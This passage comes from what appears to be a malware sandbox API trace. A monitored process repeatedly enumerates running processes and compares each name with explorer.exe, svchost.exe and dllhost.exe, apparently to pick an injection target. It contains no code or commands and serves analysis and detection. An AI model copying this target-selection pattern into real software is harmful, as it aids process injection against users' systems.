hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0200.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0200.107] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.107] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.107] CloseHandle (hObject=0xec) returned 1 [0200.107] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0200.107] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0200.107] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0200.107] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0200.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0200.107] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.108] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.108] CloseHandle (hObject=0xec) returned 1 [0200.108] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0200.108] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0200.108] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0200.108] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0200.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0200.108] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.108] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.108] CloseHandle (hObject=0xec) returned 1 [0200.108] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0200.108] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0200.108] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0200.108] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0200.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0200.109] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.109] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.109] CloseHandle (hObject=0xec) returned 1 [0200.109] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0200.109] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0200.109] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0200.109] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0200.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0200.110] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.110] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.110] CloseHandle (hObject=0xec) returned 1 [0200.110] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0200.110] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0200.110] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0200.110] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0200.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0200.110] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.110] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.110] CloseHandle (hObject=0xec) returned 1 [0200.110] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0200.110] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0200.110] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0200.110] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0200.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0200.111] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.111] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.111] CloseHandle (hObject=0xec) returned 1 [0200.111] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0200.111] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0200.111] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0200.111] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0200.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0200.112] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.112] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.112] CloseHandle (hObject=0xec) returned 1 [0200.112] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0200.112] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0200.112] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0200.112] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0200.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0200.112] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.112] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.112] CloseHandle (hObject=0xec) returned 1 [0200.112] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0200.112] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0200.112] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0200.112] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0200.113] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0200.113] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.113] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.113] CloseHandle (hObject=0xec) returned 1 [0200.113] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0200.113] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0200.113] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0200.113] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0200.114] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0200.114] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.114] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.114] CloseHandle (hObject=0xec) returned 1 [0200.114] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0200.114] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0200.114] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0200.114] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0200.114] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0200.114] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.114] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.114] CloseHandle (hObject=0xec) returned 1 [0200.114] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0200.114] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0200.114] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0200.114] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0200.115] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0200.115] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.115] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.115] CloseHandle (hObject=0xec) returned 1 [0200.115] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0200.115] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0200.115] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0200.115] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0200.116] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0200.116] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.116] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.116] CloseHandle (hObject=0xec) returned 1 [0200.116] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0200.116] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0200.116] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0200.116] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0200.116] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0200.116] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.116] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.116] CloseHandle (hObject=0xec) returned 1 [0200.116] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0200.116] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0200.116] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0200.116] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0200.117] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0200.117] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.117] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.117] CloseHandle (hObject=0xec) returned 1 [0200.117] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0200.117] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0200.117] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0200.117] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0200.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0200.118] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.118] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.118] CloseHandle (hObject=0xec) returned 1 [0200.118] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0200.118] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0200.118] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0200.118] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0200.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0200.118] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.118] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.118] CloseHandle (hObject=0xec) returned 1 [0200.119] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0200.119] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0200.119] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0200.119] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0200.119] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0200.119] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.119] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.119] CloseHandle (hObject=0xec) returned 1 [0200.119] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0200.119] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0200.119] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0200.119] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0200.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0200.120] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0200.120] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0200.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0200.121] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0200.121] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0200.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0200.122] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0200.122] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0200.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0200.172] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.172] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.172] CloseHandle (hObject=0xec) returned 1 [0200.172] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0200.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0200.173] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.173] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.173] CloseHandle (hObject=0xec) returned 1 [0200.173] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0200.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0200.173] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0200.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0200.174] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.174] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.174] CloseHandle (hObject=0xec) returned 1 [0200.174] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0200.174] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0200.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0200.175] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.175] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.175] CloseHandle (hObject=0xec) returned 1 [0200.175] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0200.175] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0200.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0200.176] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.176] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.176] CloseHandle (hObject=0xec) returned 1 [0200.176] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0200.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xec [0200.176] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.176] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.176] CloseHandle (hObject=0xec) returned 1 [0200.176] lstrcmpiA (lpString1="gtjtdfe", lpString2="explorer.exe") returned 1 [0200.176] lstrcmpiA (lpString1="gtjtdfe", lpString2="svchost.exe") returned -1 [0200.176] lstrcmpiA (lpString1="gtjtdfe", lpString2="dllhost.exe") returned 1 [0200.176] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0200.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5e4) returned 0x0 [0200.177] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0200.177] CloseHandle (hObject=0xe8) returned 1 [0200.178] Sleep (dwMilliseconds=0x3e8) [0201.234] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0201.236] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0201.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0201.236] Process32Next (in: 